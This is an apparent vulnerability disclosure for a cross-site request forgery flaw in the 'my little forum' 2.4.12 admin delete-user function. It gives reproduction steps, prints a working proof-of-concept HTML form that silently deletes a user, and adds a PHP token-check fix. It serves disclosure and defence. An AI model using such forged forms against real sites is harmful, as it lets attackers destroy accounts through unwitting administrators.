CSRF- my little forum

The platform ‘my little forum’ is a web forum based on PHP and MySQL that displays messages in a threaded view.

Version Affected: 2.4.12

Vulnerability: Cross site request forgery

Description: Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. The affected version of the software is vulnerable to a CSRF attack on the delete user functionality of the Admin page.

Steps to reproduce:

  • Launch the application.
  • On the index page, log in using the credentials created at registration (here, logged in as admin/admin).
  • After logging in, while navigating through the site, the link to the Admin page seemed interesting.
  • On the Admin page, we see a lot of functionalities, such as Forum setting, User administration, pages, etc.
  • Here User Administration seemed like a good option for targeting my little forum with cross-site request forgery, so I went forward with it. On the User Administration page, we see an option to delete a user (here I had already created a test user).
  • Select a user from the list of users and click the Delete Selected button; this takes you to another page that asks you to confirm the deletion of that user.
  • On this page, intercept the confirmation request using Burp Suite. The intercepted request contains no random token, which makes it vulnerable to CSRF.

  • For the above request, we can craft a CSRF request with the help of the form below.

The HTML code used to create the form:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8888/mylittleforum/index.php" method="POST">
<input type="hidden" name="mode" value="admin" />
<input type="hidden" name="selected&#95;confirmed&#91;&#93;" value="4" />
<input type="hidden" name="delete&#95;confirmed" value="OK&#32;&#45;&#32;Delete" />
Test this :
<input type="submit" value="Submit request" />
</form>
</body>
</html>

  • After clicking the submit button, the request crafted by us is sent and the user is deleted successfully.
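
The missing check, sketched as an added PHP example (this is not my little forum's own code or its actual fix): a per-session random token that the delete confirmation must carry. The field name csrf_token and the three function names are hypothetical, and $session / $post stand in for $_SESSION / $_POST so the script runs from the command line.

```php
<?php
// Added example: per-session CSRF token for a state-changing admin POST.
// csrf_token and all function names are hypothetical, not the project's.

// Create the token once per session; embed it as a hidden field in the form.
function issue_csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Compare the submitted token with the session copy in constant time.
function verify_csrf_token(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $supplied);
}

// Refuse the delete confirmation unless the token matches.
function handle_admin_post(array $session, array $post): string
{
    if (!isset($post['delete_confirmed'])) {
        return 'no action';
    }
    if (!verify_csrf_token($session, $post)) {
        return '403 rejected: missing or invalid CSRF token';
    }
    $ids = array_map('intval', (array)($post['selected_confirmed'] ?? []));
    return 'would delete user id(s): ' . implode(',', $ids);
}

// Constructed demo: same fields as the form above, as PHP would parse them.
$session = [];
$token   = issue_csrf_token($session);
$forged  = ['mode' => 'admin', 'selected_confirmed' => ['4'],
            'delete_confirmed' => 'OK - Delete'];
$legit   = $forged + ['csrf_token' => $token];

echo handle_admin_post($session, $forged), PHP_EOL; // rejected, no token
echo handle_admin_post($session, $legit), PHP_EOL;  // accepted
```

A page on another origin cannot read the token from the admin's session, so the cross-site form is rejected while the forum's own confirmation page, which includes the hidden field, still works.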

 

 

 
